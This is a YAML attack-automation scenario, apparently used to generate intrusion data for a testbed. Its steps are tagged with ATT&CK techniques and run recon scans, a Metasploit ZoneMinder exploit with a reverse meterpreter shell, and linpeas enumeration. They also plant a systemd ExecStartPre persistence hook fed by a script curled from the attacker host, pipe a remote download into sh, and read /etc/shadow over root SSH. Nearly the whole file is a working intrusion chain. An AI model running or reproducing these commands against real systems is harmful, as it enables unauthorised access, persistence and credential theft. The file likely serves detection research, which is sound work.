####################
#
# Scenario 1 c a
#
####################
vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $ADMIN_SERVER: 10.12.0.222
  $DOMAIN: aecid-testbed.com
  $USER: aecid
  $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
  $SSH_KEY: {{sshkey.public_key}}

commands:
  - type: shell
    cmd: 'echo "Target:  $SSH_KEY"'

  - type: shell
    cmd: dnsenum -f $DNS_LIST --dnsserver $DNS_SERVER $DOMAIN
    metadata:
      techniques: "T1590,T1591"
      tactics: "Reconnaissance"

  - type: shell
    cmd: sudo nmap -O -sT --top-ports 100 $SERVER_ADDRESS
    metadata:
      techniques: "T1595,T1592"
      tactics: "Reconnaissance"

  - type: shell
    cmd: "nikto -host $SERVER_ADDRESS"
    metadata:
      techniques: "T1595"
      tactics: "Reconnaissance"

  - type: shell
    cmd: "ffuf -w /usr/local/share/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://$SERVER_ADDRESS/FUZZ"
    metadata:
      techniques: "T1594"
      tactics: "Reconnaissance"

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp
    metadata:
      techniques: "T1190,T1059"
      tactics: "Initial Access"


  - type: msf-session
    stdapi: True
    session: "foothold"
    cmd: cd /tmp
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"

  - type: msf-session
    session: "foothold"
    cmd: upload /var/www/html/linpeas.sh
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"


  - type: msf-session
    cmd: shell
    session: "foothold"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export SHELL=bash
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: 'export PS1="PWN >"'
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: chmod +x linpeas.sh
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: ./linpeas.sh -s -q -N 2> /dev/null
    session: "foothold"
    end_str: "PWN >"
    metadata:
      techniques: "T1087,T1083,T1201,T1069,T1057,T1518,T1082,T1614,T1016,T1049,T1033,T1007,T1615"
      tactics: "Discovery"

  # wait a little bit for linpeas
  - type: sleep
    seconds: 380

  # This command fixes the outputbuffer
  # so that the output of the further
  # commands will work!
  - type: msf-session
    read: True
    cmd: id
    session: "foothold"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"

  - type: msf-session
    cmd: curl http://$ATTACKER_ADDRESS/TODO.md > /var/www/default/.zm_preload.sh
    session: "foothold"

  - type: msf-session
    cmd: vim /usr/lib/systemd/system/zoneminder.service
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: ":inoremap jj <ESC>"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: "/[Service"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: "o"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: "ExecStartPre=bash /var/www/default/.zm_preload.sh &"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: "jj"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: ":wq!\n"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"

  - type: msf-session
    cmd: "exit"
    session: "foothold"

  - type: ssh
    cmd: echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@172.17.100.121 reboot" | at now + 2 minute
    hostname: $ADMIN_SERVER
    username: aecid
    password: aecid
    jmp_hostname:  192.42.2.42
    exit_on_error: False

  - type: msf-module
    cmd: exploit/multi/handler
    creates_session: "root"
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp

  - type: msf-session
    stdapi: True
    cmd: "getuid"
    session: "root"

  - type: msf-session
    cmd: shell
    session: "root"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
      
  - type: msf-session
    cmd: export SHELL=bash
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "root"

  - type: msf-session
    cmd: id
    session: "root"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"

  - type: msf-session
    session: "root"
    cmd: "curl http://$ATTACKER_ADDRESS/README.txt.1 | sh"

  - type: sleep
    seconds: 40

  - type: msf-session
    cmd: id
    read: True
    session: "root"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"


# TODO: THIS COMMAND DOES NOT WORK
#       DON'T KNOW WHY
#  - type: msf-session
#    cmd: split --filter="/usr/bin/cat $FILE | /usr/bin/xargs /bin/bash -c " -C 2000 /root/README.txt
#    session: "root"
#    metadata:
#      techniques: "T1218,T1098"
#      tactics: "Defense Evasion,Persistence,Privilege Escalation"
#

#  - type: msf-session
#    cmd: rm /root/README.txt
#    session: "root"

  - type: msf-session
    cmd: exit
    session: "root"

  - type: msf-session
    cmd: exit
    session: "root"

  - type: sleep
    seconds: 30

  - type: ssh
    cmd: id
    hostname: 192.42.0.254
    port: 2222
    username: root
    key_filename: "/home/aecid/.ssh/attacker_key"
    creates_session: "rootshell"
    clear_cache: True
    metadata:
      techniques: "T1033"
      tactics: "Discovery"

  - type: ssh
    cmd: pwd
    session: "rootshell"

  - type: ssh
    cmd: cat /etc/shadow
    session: "rootshell"
    metadata:
      techniques: "T1555"
      tactics: "Credential Access"

  - type: ssh
    cmd: lspci
    session: "rootshell"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"

  - type: ssh
    cmd: command -v lsusb
    session: "rootshell"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"

  - type: ssh
    cmd: date
    session: "rootshell"
    metadata:
      techniques: "T1124"
      tactics: "Discovery"

  - type: ssh
    cmd: find /usr -name \*virtualbox\*
    session: "rootshell"
    metadata:
      techniques: "T1497"
      tactics: "Defense Evasion, Discovery"
